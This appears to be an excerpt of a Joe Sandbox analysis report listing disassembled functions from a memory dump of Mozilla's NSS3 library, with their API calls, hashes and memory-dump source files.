                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF31E171B05125DBEB00DF79CC40AABBBA9AB46388F200965F855A7B11E7719D04CBA2
                                                                                                                                                                                                                                                      Function 6C494E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C494E90
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C494EA9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C494EC6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C494EDF
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3 ref: 6C494EF8
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C494F05
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C494F13
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C494F3A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                      • String ID: bUIl$bUIl
                                                                                                                                                                                                                                                      • API String ID: 326028414-2371435661
                                                                                                                                                                                                                                                      • Opcode ID: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
                                                                                                                                                                                                                                                      • Instruction ID: c9f606869b076449055570b3088209b3e66325b79e15129eac9c0d28ceb60624
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9412BB4A04A15DFCB00EF68C48496ABBF0FF49354B028669EC599B714EB30E855CBD5
                                                                                                                                                                                                                                                      Function 6C4BECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C4BDE64), ref: 6C4BED0C
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4BED22
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C4BED4A
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C4BED6B
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED38
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C4BED52
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED83
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C4BED95
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C4BED9D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
                                                                                                                                                                                                                                                      • Instruction ID: cc12123f169d1b21b0e0e741964f01e7a9e5db5589837a6bfbec65452a74df62
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85118B7590020667D700E625AC90FBB727CEF8120DF020868E801B2F40F7B4B50D86EB
                                                                                                                                                                                                                                                      Function 6C580EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Aborting,?,6C462357), ref: 6C580EB8
                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C462357), ref: 6C580EC0
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_Now.NSS3 ref: 6C580A22
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C580A35
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C580A66
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_GetCurrentThread.NSS3 ref: 6C580A70
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C580A9D
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C580AC8
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_vsmprintf.NSS3(?,?), ref: 6C580AE8
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: EnterCriticalSection.KERNEL32(?), ref: 6C580B19
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C580B48
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C580C76
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_LogFlush.NSS3 ref: 6C580C7E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                      • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                      • Opcode ID: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
                                                                                                                                                                                                                                                      • Instruction ID: 0e80c764fd66bfc401cedd6e8ac79370ce27e7d9d3b2f617fb10b589658872d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0AFB99001547BDA007BA1DC4ACAB3E2DEF82368F044028FD0956A02DB36FA5596F6
                                                                                                                                                                                                                                                      Function 6C4E4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6C4E4DCB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C4E4DE1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C4E4DFF
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4E4E59
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C5A300C,00000000), ref: 6C4E4EB8
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C4E4EFF
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C4E4F56
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E521A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1025791883-0
                                                                                                                                                                                                                                                      • Opcode ID: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                                                      • Instruction ID: 7200ed4900cee7a8e74846b1faff37a26b5a6ccb87e9782ba7ef5fd523b6a65f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F17D71E01205CBDB04CF98D840FADB7B2BF4835AF264169E915AB781E775E982CB90
                                                                                                                                                                                                                                                      Function 6C474FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47502A
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475034
                                                                                                                                                                                                                                                      • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475055
                                                                                                                                                                                                                                                      • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,?,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47506D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HashLockTable
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3862423791-0
                                                                                                                                                                                                                                                      • Opcode ID: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                                                      • Instruction ID: 73ab1c6ff0f2d7e4d38279a6e550a56e3a93f3f21e444921036baac238e563c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A731A6B1B053609BEB20DAA58D4CF9737B8EB52349F028114E9158B740D375AD84CBFE
                                                                                                                                                                                                                                                      Function 6C412E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C412F3D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C412FB9
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C413005
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4130EE
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C413131
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C413178
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 984749767-598938438
                                                                                                                                                                                                                                                      • Opcode ID: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                                                      • Instruction ID: c7d30e0cb2cf7eb595d905bebda3ed1aae99f0febba214f37d17eb6b744dc29f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AB192B0E092199BCB18CF9DC884EFEBBB1BF49314F144429E485B7B45D774A942CBA4
                                                                                                                                                                                                                                                      Function 6C462D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __allrem
                                                                                                                                                                                                                                                      • String ID: @Xl$PXl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Xl
                                                                                                                                                                                                                                                      • API String ID: 2933888876-3624889994
                                                                                                                                                                                                                                                      • Opcode ID: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                                                      • Instruction ID: 97c06139c3bc32fb90f5802c877801aede76286e4dfe9e5860c780b6b7afe8c0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5261A071A00705AFDB14CF65DC94FAA7BB1FB49314F10812CE915ABB80EB31AD06CB95
                                                                                                                                                                                                                                                      Function 6C4E7F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FB2
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA51
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA6B
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: EnterCriticalSection.KERNEL32 ref: 6C46BA83
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BAA1
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: _PR_MD_UNLOCK.NSS3 ref: 6C46BAC0
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FD4
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4E9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C4E9466
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C4E801B
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C4E8034
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4E80A2
